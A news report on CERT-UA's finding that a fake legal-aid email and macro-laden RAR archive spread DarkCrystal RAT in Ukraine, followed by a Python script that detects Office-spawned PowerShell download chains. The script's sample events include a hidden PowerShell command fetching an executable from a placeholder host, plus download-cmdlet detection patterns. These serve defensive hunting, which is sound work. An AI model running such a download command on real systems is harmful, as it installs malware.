Ukraine is targeted with DarkCrystal RAT. CERT-UA cybersecurity experts: a “Free primary legal aid” email and the password-protected “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” spread the malware.
A “Free primary legal aid” email and the password-protected “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” are spreading DarkCrystal RAT in Ukraine, as reported by the CERT-UA cybersecurity experts. According to the researchers, the RAR archive contains the document “Algorithm_LegalAid.xlsm”, which is devoted to obtaining legal aid. If the document is opened and the macro is enabled, a PowerShell command is executed that downloads and runs the .NET bootloader “MSCommondll.exe”. That executable, in turn, downloads and runs the malware. Based on the recipients' email addresses, as well as the domain used to control DarkCrystal RAT, the researchers assume that the attack is aimed at operators and telecommunications providers of Ukraine. During the previous attack, on June 10, 2022, media organizations of Ukraine (CERT-UA#4797) were the objects of interest of cybercrime/cyber warfare actors.
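The chain described above (Office document macro, then PowerShell, then a downloaded executable) can be hunted in process-creation telemetry. The following is an added example, not code from CERT-UA or the article: the event fields are modelled on Sysmon Event ID 1, every sample event is constructed, and only the two file names come from the text. It assumes events arrive in chronological order and ignores PID reuse.

```python
import ntpath
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|programdata)\\", re.I)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events; paths, PIDs and the URL are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'EXCEL.EXE "C:\Users\user\Downloads\Algorithm_LegalAid.xlsm"'},
    {"pid": 300, "ppid": 200, "image": PS,
     "cmd": r"powershell -w hidden Invoke-WebRequest http://placeholder.invalid/f -OutFile $env:TEMP\MSCommondll.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\user\AppData\Local\Temp\MSCommondll.exe",
     "cmd": "MSCommondll.exe"},
    {"pid": 500, "ppid": 100, "image": PS, "cmd": "powershell Get-ChildItem"},  # benign: user-launched
]

def name(event):
    """Lower-cased executable name from a Windows image path."""
    return ntpath.basename(event["image"]).lower()

def find_macro_chains(events):
    """Return (stage, pid, detail) alerts for Office -> PowerShell -> dropped binary."""
    by_pid = {e["pid"]: e for e in events}
    alerts, flagged_shells = [], set()
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if name(e) in SHELLS and name(parent) in OFFICE:
            # Stage 1: an Office application spawned PowerShell (macro execution).
            flagged_shells.add(e["pid"])
            stage = "office-shell-download" if DOWNLOAD.search(e["cmd"]) else "office-shell"
            alerts.append((stage, e["pid"], name(parent)))
        elif e["ppid"] in flagged_shells and USER_WRITABLE.search(e["image"]):
            # Stage 2: that PowerShell started a binary from a user-writable path.
            alerts.append(("dropped-binary-run", e["pid"], name(e)))
    return alerts

if __name__ == "__main__":
    for alert in find_macro_chains(EVENTS):
        print(alert)
```

The PowerShell instance started from `explorer.exe` (PID 500) is not flagged, which keeps ordinary interactive use out of the alert stream.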